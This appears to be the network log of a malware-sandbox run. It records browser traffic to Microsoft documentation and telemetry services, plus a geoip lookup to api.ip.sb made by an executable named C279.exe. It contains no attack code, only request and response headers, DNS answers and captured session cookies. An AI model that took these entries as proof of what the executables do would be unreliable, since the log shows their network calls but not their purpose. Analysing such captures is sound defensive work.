referer: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=C055.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MicrosoftApplicationsTelemetryDeviceId=167ed090-97d1-41e2-8b47-f8d33590f907
cookie: ai_session=PWxTf729LVnemBRVa4+MUp|1696959354953|1696959354953

Response

HTTP/2.0 200

content-type: application/json; charset=utf-8
content-encoding: gzip
vary: Origin,Accept-Encoding
access-control-allow-origin: https://learn.microsoft.com
request-context: appId=cid-v1:8da7faac-355b-4ce1-beec-f624ec5c6263
x-ms-operation-id: 1f2eee99a42eef73f8c07cfefba5a032
x-content-type-options: nosniff
x-powered-by: ASP.NET
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.01,"failure_fraction":1.0}
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://mdec.nelreports.net/api/report?cat=mdocs"}]}
x-azure-ref: 0fIslZQAAAAAsV+0Nvs8CRLejy+yOOulzQU1TMDRFREdFMTgwNgA3MTY4OTIwZS05ZjViLTRhNjItYjE2ZS1kNWJlNjNjZTYxZTc=
content-length: 870
cache-control: public, max-age=43186
expires: Wed, 11 Oct 2023 05:35:42 GMT
date: Tue, 10 Oct 2023 17:35:56 GMT
akamai-cache-status: Miss from child, Miss from parent
strict-transport-security: max-age=31536000; includeSubDomains; preload
GET

https://learn.microsoft.com/en-us/media/event-banners/banner-ignite-2023-flatcolor.png?branch=live

msedge.exe

Remote address:

104.85.2.139:443

Request

GET /en-us/media/event-banners/banner-ignite-2023-flatcolor.png?branch=live HTTP/2.0
host: learn.microsoft.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://learn.microsoft.com/_themes/docs.theme/master/en-us/_themes/styles/478858f5.site-ltr.css
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MicrosoftApplicationsTelemetryDeviceId=167ed090-97d1-41e2-8b47-f8d33590f907
cookie: ai_session=PWxTf729LVnemBRVa4+MUp|1696959354953|1696959354953

Response

HTTP/2.0 200

content-length: 98901
content-type: image/png
last-modified: Tue, 03 Oct 2023 22:58:44 GMT
etag: "0x8DBC4644B8943D0"
request-context: appId=cid-v1:8f3babe3-1612-4642-87ca-e9e867ad0935
x-datacenter: eus
x-frame-options: SAMEORIGIN
x-content-type-options: nosniff
x-ua-compatible: IE=edge
x-xss-protection: 1; mode=block
x-rendering-stack: Static
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.01,"failure_fraction":1.0}
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://mdec.nelreports.net/api/report?cat=mdocs"}]}
x-azure-ref: 0V6IdZQAAAAB7s2cY8y5kSIB96Wk7QQsgQlJVMzBFREdFMTExNgA3MTY4OTIwZS05ZjViLTRhNjItYjE2ZS1kNWJlNjNjZTYxZTc=
cache-control: public, max-age=398
expires: Tue, 10 Oct 2023 17:42:34 GMT
date: Tue, 10 Oct 2023 17:35:56 GMT
akamai-cache-status: Hit from child
strict-transport-security: max-age=31536000; includeSubDomains; preload
GET

https://learn.microsoft.com/_themes/docs.theme/master/en-us/_themes/styles/docons.28d69bd4.woff2

msedge.exe

Remote address:

104.85.2.139:443

Request

GET /_themes/docs.theme/master/en-us/_themes/styles/docons.28d69bd4.woff2 HTTP/2.0
host: learn.microsoft.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://learn.microsoft.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: font
referer: https://learn.microsoft.com/_themes/docs.theme/master/en-us/_themes/styles/478858f5.site-ltr.css
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MicrosoftApplicationsTelemetryDeviceId=167ed090-97d1-41e2-8b47-f8d33590f907
cookie: ai_session=PWxTf729LVnemBRVa4+MUp|1696959354953|1696959354953

Response

HTTP/2.0 200

content-length: 17956
content-type: font/woff2
last-modified: Mon, 09 Oct 2023 21:01:25 GMT
etag: "0x8DBC90AE6AC067F"
request-context: appId=cid-v1:8f3babe3-1612-4642-87ca-e9e867ad0935
x-datacenter: eus
x-frame-options: SAMEORIGIN
x-content-type-options: nosniff
x-ua-compatible: IE=edge
x-xss-protection: 1; mode=block
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.01,"failure_fraction":1.0}
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://mdec.nelreports.net/api/report?cat=mdocs"}]}
x-azure-ref: 0VRAlZQAAAADjMj2EfUPIRqWVVf7OLJfkQlJVMzBFREdFMDcwOAA3MTY4OTIwZS05ZjViLTRhNjItYjE2ZS1kNWJlNjNjZTYxZTc=
cache-control: public, max-age=573218
expires: Tue, 17 Oct 2023 08:49:34 GMT
date: Tue, 10 Oct 2023 17:35:56 GMT
akamai-cache-status: Hit from child
strict-transport-security: max-age=31536000; includeSubDomains; preload
GET

https://learn.microsoft.com/en-us/media/logos/logo_net.svg

msedge.exe

Remote address:

104.85.2.139:443

Request

GET /en-us/media/logos/logo_net.svg HTTP/2.0
host: learn.microsoft.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=C055.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MicrosoftApplicationsTelemetryDeviceId=167ed090-97d1-41e2-8b47-f8d33590f907
cookie: ai_session=PWxTf729LVnemBRVa4+MUp|1696959354953|1696959354953

Response

HTTP/2.0 200

content-type: image/svg+xml
last-modified: Mon, 01 May 2023 22:46:35 GMT
etag: "0x8DB4A95EAB97D55"
request-context: appId=cid-v1:8f3babe3-1612-4642-87ca-e9e867ad0935
x-datacenter: eus
x-frame-options: SAMEORIGIN
x-content-type-options: nosniff
x-ua-compatible: IE=edge
x-xss-protection: 1; mode=block
x-rendering-stack: Static
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.01,"failure_fraction":1.0}
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://mdec.nelreports.net/api/report?cat=mdocs"}]}
x-azure-ref: 0x1lQZAAAAAAFJ1oXoR2OTI/DIjg4nFxbTE9OMjFFREdFMTgxMgA3MTY4OTIwZS05ZjViLTRhNjItYjE2ZS1kNWJlNjNjZTYxZTc=
vary: Accept-Encoding
content-encoding: gzip
content-length: 542
cache-control: public, max-age=1166
expires: Tue, 10 Oct 2023 17:55:22 GMT
date: Tue, 10 Oct 2023 17:35:56 GMT
akamai-cache-status: Hit from child
strict-transport-security: max-age=31536000; includeSubDomains; preload
GET

https://learn.microsoft.com/dotnet/framework/install/application-not-started?version=(null)&processName=C055.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0

msedge.exe

Remote address:

104.85.2.139:443

Request

GET /dotnet/framework/install/application-not-started?version=(null)&processName=C055.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0 HTTP/2.0
host: learn.microsoft.com
dnt: 1
upgrade-insecure-requests: 1
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
sec-fetch-site: none
sec-fetch-mode: navigate
sec-fetch-user: ?1
sec-fetch-dest: document
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
sec-ch-ua-mobile: ?0
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MicrosoftApplicationsTelemetryDeviceId=167ed090-97d1-41e2-8b47-f8d33590f907
cookie: ai_session=PWxTf729LVnemBRVa4+MUp|1696959354953|1696959354953

Response

HTTP/2.0 301

location: /en-us/dotnet/framework/install/application-not-started?version=(null)&processName=C055.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
request-context: appId=cid-v1:8f3babe3-1612-4642-87ca-e9e867ad0935
x-datacenter: eus
x-frame-options: SAMEORIGIN
x-content-type-options: nosniff
x-ua-compatible: IE=edge
x-xss-protection: 1; mode=block
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.01,"failure_fraction":1.0}
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://mdec.nelreports.net/api/report?cat=mdocs"}]}
x-azure-ref: 0fYslZQAAAAAp/oOATm/PQaQBpd1xgiK1QlJVMzBFREdFMDcyMAA3MTY4OTIwZS05ZjViLTRhNjItYjE2ZS1kNWJlNjNjZTYxZTc=
content-length: 0
cache-control: no-cache, no-store
expires: Tue, 10 Oct 2023 17:35:57 GMT
date: Tue, 10 Oct 2023 17:35:57 GMT
akamai-cache-status: Miss from child, Miss from parent
strict-transport-security: max-age=31536000; includeSubDomains; preload
GET

https://learn.microsoft.com/media/logos/logo_net.svg

msedge.exe

Remote address:

104.85.2.139:443

Request

GET /media/logos/logo_net.svg HTTP/2.0
host: learn.microsoft.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=C055.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MicrosoftApplicationsTelemetryDeviceId=167ed090-97d1-41e2-8b47-f8d33590f907
cookie: ai_session=PWxTf729LVnemBRVa4+MUp|1696959354953|1696959354953

Response

HTTP/2.0 301

location: /en-us/media/logos/logo_net.svg
request-context: appId=cid-v1:8f3babe3-1612-4642-87ca-e9e867ad0935
x-datacenter: eus
x-frame-options: SAMEORIGIN
x-content-type-options: nosniff
x-ua-compatible: IE=edge
x-xss-protection: 1; mode=block
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.01,"failure_fraction":1.0}
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://mdec.nelreports.net/api/report?cat=mdocs"}]}
x-azure-ref: 0f4slZQAAAAALRPXX5RPoTZAZi31nLV7cQU1TMDRFREdFMTgxNgA3MTY4OTIwZS05ZjViLTRhNjItYjE2ZS1kNWJlNjNjZTYxZTc=
content-length: 0
cache-control: no-cache, no-store
expires: Tue, 10 Oct 2023 17:35:59 GMT
date: Tue, 10 Oct 2023 17:35:59 GMT
akamai-cache-status: Miss from child, Miss from parent
strict-transport-security: max-age=31536000; includeSubDomains; preload
POST

https://learn.microsoft.com/api/recommendations/c89966aa-b155-c98a-2391-47e01d468236/batch

msedge.exe

Remote address:

104.85.2.139:443

Request

POST /api/recommendations/c89966aa-b155-c98a-2391-47e01d468236/batch HTTP/2.0
host: learn.microsoft.com
content-length: 153
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
content-type: application/json
accept: */*
origin: https://learn.microsoft.com
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=C055.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MicrosoftApplicationsTelemetryDeviceId=167ed090-97d1-41e2-8b47-f8d33590f907
cookie: ai_session=PWxTf729LVnemBRVa4+MUp|1696959354953|1696959359066

Response

HTTP/2.0 200

content-type: application/json; charset=utf-8
content-encoding: gzip
vary: Origin,Accept-Encoding
access-control-allow-origin: https://learn.microsoft.com
request-context: appId=cid-v1:8da7faac-355b-4ce1-beec-f624ec5c6263
x-ms-operation-id: ba9b6103dceb28203bc971881da16c49
x-content-type-options: nosniff
x-powered-by: ASP.NET
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.01,"failure_fraction":1.0}
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://mdec.nelreports.net/api/report?cat=mdocs"}]}
x-azure-ref: 0gIslZQAAAAC2fsp+uOulTLjE+YEk/45mQlJVMzBFREdFMDcxNwA3MTY4OTIwZS05ZjViLTRhNjItYjE2ZS1kNWJlNjNjZTYxZTc=
content-length: 869
cache-control: public, max-age=43147
expires: Wed, 11 Oct 2023 05:35:07 GMT
date: Tue, 10 Oct 2023 17:36:00 GMT
akamai-cache-status: Miss from child, Miss from parent
strict-transport-security: max-age=31536000; includeSubDomains; preload
GET

https://learn.microsoft.com/favicon.ico

msedge.exe

Remote address:

104.85.2.139:443

Request

GET /favicon.ico HTTP/2.0
host: learn.microsoft.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=C055.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MicrosoftApplicationsTelemetryDeviceId=167ed090-97d1-41e2-8b47-f8d33590f907
cookie: ai_session=PWxTf729LVnemBRVa4+MUp|1696959354953|1696959359066

Response

HTTP/2.0 200

content-length: 17174
content-type: image/x-icon
last-modified: Thu, 01 Jun 2023 01:34:23 GMT
etag: "0x8DB6240546D1FAB"
request-context: appId=cid-v1:8f3babe3-1612-4642-87ca-e9e867ad0935
x-datacenter: eus
x-frame-options: SAMEORIGIN
x-content-type-options: nosniff
x-ua-compatible: IE=edge
x-xss-protection: 1; mode=block
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.01,"failure_fraction":1.0}
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://mdec.nelreports.net/api/report?cat=mdocs"}]}
x-azure-ref: 0HO18ZAAAAAD2V0kOsHHARaLs4TlNmskMQU1TMDRFREdFMTgxNgA3MTY4OTIwZS05ZjViLTRhNjItYjE2ZS1kNWJlNjNjZTYxZTc=
cache-control: public, max-age=602716
expires: Tue, 17 Oct 2023 17:01:16 GMT
date: Tue, 10 Oct 2023 17:36:00 GMT
akamai-cache-status: Hit from child
strict-transport-security: max-age=31536000; includeSubDomains; preload
DNS

114.110.16.96.in-addr.arpa

Remote address:

8.8.8.8:53

Request

114.110.16.96.in-addr.arpa

IN PTR

Response

114.110.16.96.in-addr.arpa

IN PTR

a96-16-110-114deploystaticakamaitechnologiescom
DNS

wcpstatic.microsoft.com

msedge.exe

Remote address:

8.8.8.8:53

Request

wcpstatic.microsoft.com

IN A

Response

wcpstatic.microsoft.com

IN CNAME

consentdeliveryfd.azurefd.net

consentdeliveryfd.azurefd.net

IN CNAME

firstparty-azurefd-prod.trafficmanager.net

firstparty-azurefd-prod.trafficmanager.net

IN CNAME

dual.part-0039.t-0009.t-msedge.net

dual.part-0039.t-0009.t-msedge.net

IN CNAME

part-0039.t-0009.t-msedge.net

part-0039.t-0009.t-msedge.net

IN A

13.107.246.67

part-0039.t-0009.t-msedge.net

IN A

13.107.213.67
DNS

js.monitor.azure.com

msedge.exe

Remote address:

8.8.8.8:53

Request

js.monitor.azure.com

IN A

Response

js.monitor.azure.com

IN CNAME

aijscdn2.azureedge.net

aijscdn2.azureedge.net

IN CNAME

aijscdn2.afd.azureedge.net

aijscdn2.afd.azureedge.net

IN CNAME

firstparty-azurefd-prod.trafficmanager.net

firstparty-azurefd-prod.trafficmanager.net

IN CNAME

dual.part-0039.t-0009.t-msedge.net

dual.part-0039.t-0009.t-msedge.net

IN CNAME

part-0039.t-0009.t-msedge.net

part-0039.t-0009.t-msedge.net

IN A

13.107.246.67

part-0039.t-0009.t-msedge.net

IN A

13.107.213.67
GET

https://wcpstatic.microsoft.com/mscc/lib/v2/wcp-consent.js

msedge.exe

Remote address:

13.107.246.67:443

Request

GET /mscc/lib/v2/wcp-consent.js HTTP/2.0
host: wcpstatic.microsoft.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: script
referer: https://learn.microsoft.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: max-age=43200
content-length: 81726
content-type: application/javascript
content-encoding: gzip
content-md5: X1JOIM5h9UISVFS6+GfEew==
last-modified: Wed, 24 Aug 2022 17:34:36 GMT
age: 28496
etag: 0x8DA85F6EA62BF74
vary: Accept-Encoding
access-control-allow-origin: *
access-control-expose-headers: x-ms-request-id,Server,x-ms-version,Content-Length,Date,Transfer-Encoding
x-cache: CONFIG_NOCACHE
x-ms-blob-type: BlockBlob
x-ms-lease-status: unlocked
x-ms-request-id: 0d5b22f4-b01e-0044-205d-fb486a000000
x-ms-version: 2009-09-19
x-azure-ref: 0eYslZQAAAADADWBhU8GPQLwmov+EVePXQlJVMzBFREdFMTAwNwAzOWI0NjE1Ny1jYjllLTQ5YjctYTY1YS04NzIyYTNmODI0ZTQ=
date: Tue, 10 Oct 2023 17:35:52 GMT
GET

https://js.monitor.azure.com/scripts/c/ms.jsll-3.min.js

msedge.exe

Remote address:

13.107.246.67:443

Request

GET /scripts/c/ms.jsll-3.min.js HTTP/2.0
host: js.monitor.azure.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: script
referer: https://learn.microsoft.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=1800, immutable, no-transform
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: n2Z/y+eaLwpYgTFdIs5bNA==
last-modified: Thu, 21 Sep 2023 19:29:40 GMT
etag: 0x8DBBAD919F17481
x-cache: TCP_HIT
x-ms-request-id: 8473960f-601e-00a0-689d-fb5eed000000
x-ms-version: 2009-09-19
x-ms-meta-jssdkver: 3.2.14
x-ms-meta-jssdksrc: [cdn]/scripts/c/ms.jsll-3.2.14.min.js
access-control-expose-headers: x-ms-request-id,Server,x-ms-version,x-ms-meta-jssdkver,x-ms-meta-jssdksrc,Content-Type,Cache-Control,Last-Modified,ETag,Content-MD5,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
access-control-allow-origin: *
x-azure-ref: 0eYslZQAAAACjJPmsTPu7R5DRPpC4RJ8WQU1TMDRFREdFMTkyMgBmMWNhNzNkNC04ODgzLTRjYWYtYWJkYy1mZTJkNTY3YWZiOTY=
date: Tue, 10 Oct 2023 17:35:53 GMT
DNS

139.2.85.104.in-addr.arpa

Remote address:

8.8.8.8:53

Request

139.2.85.104.in-addr.arpa

IN PTR

Response

139.2.85.104.in-addr.arpa

IN PTR

a104-85-2-139deploystaticakamaitechnologiescom
DNS

mscom.demdex.net

msedge.exe

Remote address:

8.8.8.8:53

Request

mscom.demdex.net

IN A

Response

mscom.demdex.net

IN CNAME

gslb-2.demdex.net

gslb-2.demdex.net

IN CNAME

edge-irl1.demdex.net

edge-irl1.demdex.net

IN CNAME

dcs-edge-irl1-876252164.eu-west-1.elb.amazonaws.com

dcs-edge-irl1-876252164.eu-west-1.elb.amazonaws.com

IN A

34.255.45.168

dcs-edge-irl1-876252164.eu-west-1.elb.amazonaws.com

IN A

52.18.44.230

dcs-edge-irl1-876252164.eu-west-1.elb.amazonaws.com

IN A

34.251.64.143

dcs-edge-irl1-876252164.eu-west-1.elb.amazonaws.com

IN A

99.80.170.99

dcs-edge-irl1-876252164.eu-west-1.elb.amazonaws.com

IN A

54.229.208.26

dcs-edge-irl1-876252164.eu-west-1.elb.amazonaws.com

IN A

54.229.131.209

dcs-edge-irl1-876252164.eu-west-1.elb.amazonaws.com

IN A

34.254.109.178

dcs-edge-irl1-876252164.eu-west-1.elb.amazonaws.com

IN A

99.81.14.86
DNS

microsoftmscompoc.tt.omtrdc.net

msedge.exe

Remote address:

8.8.8.8:53

Request

microsoftmscompoc.tt.omtrdc.net

IN A

Response

microsoftmscompoc.tt.omtrdc.net

IN CNAME

adobetarget.data.adobedc.net

adobetarget.data.adobedc.net

IN A

66.235.152.107

adobetarget.data.adobedc.net

IN A

66.235.152.143

adobetarget.data.adobedc.net

IN A

66.235.152.113

adobetarget.data.adobedc.net

IN A

66.235.152.152

adobetarget.data.adobedc.net

IN A

66.235.152.115

adobetarget.data.adobedc.net

IN A

66.235.152.126
DNS

microsoftmscompoc.tt.omtrdc.net

msedge.exe

Remote address:

8.8.8.8:53

Request

microsoftmscompoc.tt.omtrdc.net

IN A

Response

microsoftmscompoc.tt.omtrdc.net

IN CNAME

adobetarget.data.adobedc.net

adobetarget.data.adobedc.net

IN A

66.235.152.115

adobetarget.data.adobedc.net

IN A

66.235.152.126

adobetarget.data.adobedc.net

IN A

66.235.152.107

adobetarget.data.adobedc.net

IN A

66.235.152.143

adobetarget.data.adobedc.net

IN A

66.235.152.113

adobetarget.data.adobedc.net

IN A

66.235.152.152
DNS

target.microsoft.com

msedge.exe

Remote address:

8.8.8.8:53

Request

target.microsoft.com

IN A

Response

target.microsoft.com

IN CNAME

microsoftmscompoc.tt.omtrdc.net

microsoftmscompoc.tt.omtrdc.net

IN CNAME

adobetarget.data.adobedc.net

adobetarget.data.adobedc.net

IN A

66.235.152.143

adobetarget.data.adobedc.net

IN A

66.235.152.113

adobetarget.data.adobedc.net

IN A

66.235.152.152

adobetarget.data.adobedc.net

IN A

66.235.152.115

adobetarget.data.adobedc.net

IN A

66.235.152.126

adobetarget.data.adobedc.net

IN A

66.235.152.107
DNS

67.246.107.13.in-addr.arpa

Remote address:

8.8.8.8:53

Request

67.246.107.13.in-addr.arpa

IN PTR

Response
DNS

67.246.107.13.in-addr.arpa

Remote address:

8.8.8.8:53

Request

67.246.107.13.in-addr.arpa

IN PTR

Response
DNS

168.45.255.34.in-addr.arpa

Remote address:

8.8.8.8:53

Request

168.45.255.34.in-addr.arpa

IN PTR

Response

168.45.255.34.in-addr.arpa

IN PTR

ec2-34-255-45-168 eu-west-1compute amazonawscom
DNS

168.45.255.34.in-addr.arpa

Remote address:

8.8.8.8:53

Request

168.45.255.34.in-addr.arpa

IN PTR

Response

168.45.255.34.in-addr.arpa

IN PTR

ec2-34-255-45-168 eu-west-1compute amazonawscom
DNS

api.ip.sb

C279.exe

Remote address:

8.8.8.8:53

Request

api.ip.sb

IN A

Response

api.ip.sb

IN CNAME

api.ip.sb.cdn.cloudflare.net

api.ip.sb.cdn.cloudflare.net

IN A

104.26.13.31

api.ip.sb.cdn.cloudflare.net

IN A

172.67.75.172

api.ip.sb.cdn.cloudflare.net

IN A

104.26.12.31
GET

https://api.ip.sb/geoip

C279.exe

Remote address:

104.26.13.31:443

Request

GET /geoip HTTP/1.1
Host: api.ip.sb
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Date: Tue, 10 Oct 2023 17:35:56 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 285
Connection: keep-alive
vary: Accept-Encoding
vary: Accept-Encoding
Cache-Control: no-cache
access-control-allow-origin: *
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=HRKFF3HSvVEnc6lLWicwx7c0Qd29aon89VVo5QmmpXJqETeALYmb7FoiZt6dAJ0WTxF%2FnwNgTrXYPS1HIQufLuc6U3fivuphEnxFAhRszLBkzcZz%2FV4hll614w%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Server: cloudflare
CF-RAY: 81409f6a5c410bae-AMS
alt-svc: h3=":443"; ma=86400
DNS

31.13.26.104.in-addr.arpa

Remote address:

8.8.8.8:53

Request

31.13.26.104.in-addr.arpa

IN PTR

Response
DNS

browser.events.data.microsoft.com

msedge.exe

Remote address:

8.8.8.8:53

Request

browser.events.data.microsoft.com

IN A

Response

browser.events.data.microsoft.com

IN CNAME

browser.events.data.trafficmanager.net

browser.events.data.trafficmanager.net

IN CNAME

onedscolprdcus06.centralus.cloudapp.azure.com

onedscolprdcus06.centralus.cloudapp.azure.com

IN A

13.89.179.8
OPTIONS

https://browser.events.data.microsoft.com/OneCollector/1.0/?cors=true&content-type=application/x-json-stream&w=0

msedge.exe

Remote address:

13.89.179.8:443

Request

OPTIONS /OneCollector/1.0/?cors=true&content-type=application/x-json-stream&w=0 HTTP/2.0
host: browser.events.data.microsoft.com
accept: */*
access-control-request-method: POST
access-control-request-headers: apikey,cache-control,client-id,client-version,content-type,time-delta-to-apply-millis,upload-time
origin: https://learn.microsoft.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-fetch-mode: cors
sec-fetch-site: same-site
sec-fetch-dest: empty
referer: https://learn.microsoft.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, 3600
content-length: 0
server: Microsoft-HTTPAPI/2.0
strict-transport-security: max-age=31536000
access-control-allow-credentials: true
access-control-allow-headers: AuthMsaDeviceTicket,AuthXToken,Content-Encoding,Content-Type,Cache-Control,Client-Id,SDK-Name,sdk-version,apikey,x-apikey,client-version,upload-time,time-delta-to-apply-millis,client-time-epoch-millis,persistence-mode,reliability-mode,NoResponseBody
access-control-max-age: 3600
access-control-allow-origin: https://learn.microsoft.com
date: Tue, 10 Oct 2023 17:36:00 GMT
OPTIONS

https://browser.events.data.microsoft.com/OneCollector/1.0/?cors=true&content-type=application/x-json-stream&ext.intweb.msfpc=GUID%3Dc3549a94b71b4fa8ad2e02b24e084cc1%26HASH%3Dc354%26LV%3D202310%26V%3D4%26LU%3D1696959362094&w=0

msedge.exe

Remote address:

13.89.179.8:443

Request

OPTIONS /OneCollector/1.0/?cors=true&content-type=application/x-json-stream&ext.intweb.msfpc=GUID%3Dc3549a94b71b4fa8ad2e02b24e084cc1%26HASH%3Dc354%26LV%3D202310%26V%3D4%26LU%3D1696959362094&w=0 HTTP/2.0
host: browser.events.data.microsoft.com
accept: */*
access-control-request-method: POST
access-control-request-headers: apikey,cache-control,client-id,client-version,content-type,time-delta-to-apply-millis,upload-time
origin: https://learn.microsoft.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-fetch-mode: cors
sec-fetch-site: same-site
sec-fetch-dest: empty
referer: https://learn.microsoft.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, 3600
content-length: 0
server: Microsoft-HTTPAPI/2.0
strict-transport-security: max-age=31536000
access-control-allow-credentials: true
access-control-allow-headers: AuthMsaDeviceTicket,AuthXToken,Content-Encoding,Content-Type,Cache-Control,Client-Id,SDK-Name,sdk-version,apikey,x-apikey,client-version,upload-time,time-delta-to-apply-millis,client-time-epoch-millis,persistence-mode,reliability-mode,NoResponseBody
access-control-max-age: 3600
